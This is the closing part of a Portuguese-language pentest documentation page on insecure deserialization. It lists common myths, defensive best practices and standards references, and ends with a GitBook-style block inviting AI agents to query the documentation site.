**Mitos Comuns sobre DesserializaĆ§Ć£o** * āŒ "JSON Ć© sempre seguro" ā†’ **FALSO** (pode ter prototype pollution em JS) * āŒ "Assinatura torna seguro" ā†’ **FALSO** (sĆ³ verifica integridade, nĆ£o conteĆŗdo) * āŒ "Whitelist Ć© 100% efetiva" ā†’ **FALSO** (pode ter bypass com gadgets na whitelist) * āŒ "SĆ³ aplicaƧƵes enterprise sĆ£o afetadas" ā†’ **FALSO** (afeta qualquer app com desserializaĆ§Ć£o) ### **Boas PrĆ”ticas Essenciais** 1. **PrevenĆ§Ć£o**: Evitar desserializaĆ§Ć£o de dados nĆ£o confiĆ”veis quando possĆ­vel 2. **ValidaĆ§Ć£o**: Implementar whitelists rigorosas e validaĆ§Ć£o de schema 3. **Monitoramento**: Logar e monitorar operaƧƵes de desserializaĆ§Ć£o 4. **AtualizaĆ§Ć£o**: Manter bibliotecas atualizadas e aplicar patches de seguranƧa 5. **Defesa em Profundidade**: MĆŗltiplas camadas de seguranƧa ### **ReferĆŖncias e PadrƵes** * OWASP Deserialization Cheat Sheet * CERT Oracle Secure Coding Guidelines * MITRE ATT\&CK Framework * NIST Cybersecurity Framework **šŸ” Lembre-se**: DesserializaĆ§Ć£o insegura Ć© uma das vulnerabilidades mais crĆ­ticas e frequentemente negligenciadas. Sempre valide e verifique dados nĆ£o confiĆ”veis antes da desserializaĆ§Ć£o e prefira formatos seguros como JSON com validaĆ§Ć£o de schema. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/linguagens-de-programacao/insecure-deserialization.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.